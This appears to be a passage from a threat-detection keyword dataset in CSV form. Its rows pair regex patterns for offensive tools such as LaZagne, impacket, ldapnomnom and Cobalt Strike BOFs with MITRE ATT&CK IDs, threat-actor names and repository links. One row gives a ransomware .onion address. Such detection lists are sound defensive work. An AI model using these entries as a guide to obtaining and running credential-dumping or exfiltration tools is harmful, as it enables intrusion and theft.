"*LaunchPreCompromise.ps1*",".{0,1000}LaunchPreCompromise\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","50840"
"*lawrenceamer/dns-black-cat*",".{0,1000}lawrenceamer\/dns\-black\-cat.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","50841"
"*lawrenceamer/Tchopper*",".{0,1000}lawrenceamer\/Tchopper.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","50842"
"*layer8secure/SilentHound*",".{0,1000}layer8secure\/SilentHound.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","50843"
"*Lazagne*Passwords.txt*",".{0,1000}Lazagne.{0,1000}Passwords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","50844"
"*laZagne.exe browsers*",".{0,1000}laZagne\.exe\sbrowsers.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50845"
"*Lazagne.exe*",".{0,1000}Lazagne\.exe.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50846"
"*laZagne.exe*",".{0,1000}laZagne\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","50847"
"*Lazagne.py*",".{0,1000}Lazagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50848"
"*lazagne.softwares.sysadmin.aws*",".{0,1000}lazagne\.softwares\.sysadmin\.aws.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50849"
"*lazagne.softwares.windows*",".{0,1000}lazagne\.softwares\.windows.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50850"
"*lazagne.tar.gz*",".{0,1000}lazagne\.tar\.gz.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50851"
"*LaZagneForensic*",".{0,1000}LaZagneForensic.{0,1000}","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","N/A","5","498","111","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z","50852"
"*LaZagne-master.zip*",".{0,1000}LaZagne\-master\.zip.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","50853"
"*lazynmap.sh*",".{0,1000}lazynmap\.sh.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/LALIN","1","1","N/A","N/A","N/A","4","366","150","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z","50854"
"*lazypariah *",".{0,1000}lazypariah\s.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","50855"
"*lazypariah.svg*",".{0,1000}lazypariah\.svg.{0,1000}","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Resource Development","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","N/A","2","140","28","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z","50856"
"*lc65fb3wrvox6xlyn4hklwjcojau55diqxxylqs4qsfng23ftzijnxad.onion*",".{0,1000}lc65fb3wrvox6xlyn4hklwjcojau55diqxxylqs4qsfng23ftzijnxad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50857"
"*L-codes/pwcrack-framework*",".{0,1000}L\-codes\/pwcrack\-framework.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","50861"
"*L'D', L'b', L'g', L'h', L'e', L'l', L'p', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'D\',\sL\'b\',\sL\'g\',\sL\'h\',\sL\'e\',\sL\'l\',\sL\'p\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50862"
"*ldap as ldap_impacket*",".{0,1000}ldap\sas\sldap_impacket.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","50863"
"*LDAP PASSWORD ENUM*",".{0,1000}LDAP\sPASSWORD\sENUM.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50864"
"*LDAP PASSWORD HUNTER*",".{0,1000}LDAP\sPASSWORD\sHUNTER.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50865"
"*ldap_enums.go*",".{0,1000}ldap_enums\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","50866"
"*ldap_shell.py*",".{0,1000}ldap_shell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50867"
"*ldap3.git@powerview.py*",".{0,1000}ldap3\.git\@powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","50868"
"*ldapasn1.py*",".{0,1000}ldapasn1\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50869"
"*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","50870"
"*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50871"
"*ldapattack.py*",".{0,1000}ldapattack\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","50872"
"*ldapdomaindump*",".{0,1000}ldapdomaindump.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","50873"
"*LDAPDomainDump*",".{0,1000}LDAPDomainDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50874"
"*ldapdomaindump.zip*",".{0,1000}ldapdomaindump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50875"
"*ldapfilter:*admincount=1* /format:hashcat*",".{0,1000}ldapfilter\:.{0,1000}admincount\=1.{0,1000}\s\/format\:hashcat.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50876"
"*LdapMiner*",".{0,1000}LdapMiner.{0,1000}","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0007","N/A","N/A","Discovery","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50877"
"*ldapnomnom *",".{0,1000}ldapnomnom\s.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50878"
"*ldapnomnom --input*",".{0,1000}ldapnomnom\s\-\-input.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50879"
"*ldapnomnom*-obfuscated*",".{0,1000}ldapnomnom.{0,1000}\-obfuscated.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50880"
"*ldapnomnom-darwin-*",".{0,1000}ldapnomnom\-darwin\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","#linux","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50881"
"*ldapnomnom-linux-*",".{0,1000}ldapnomnom\-linux\-.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","#linux","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50882"
"*ldapnomnom-main*",".{0,1000}ldapnomnom\-main.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50883"
"*ldapnomnom-windows-386.exe*",".{0,1000}ldapnomnom\-windows\-386\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50884"
"*ldapnomnom-windows-amd64.exe*",".{0,1000}ldapnomnom\-windows\-amd64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50885"
"*ldapnomnom-windows-arm64.exe*",".{0,1000}ldapnomnom\-windows\-arm64\.exe.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","50886"
"*LDAP-Password-Hunter*",".{0,1000}LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","50887"
"*ldaprelayclient.py*",".{0,1000}ldaprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti 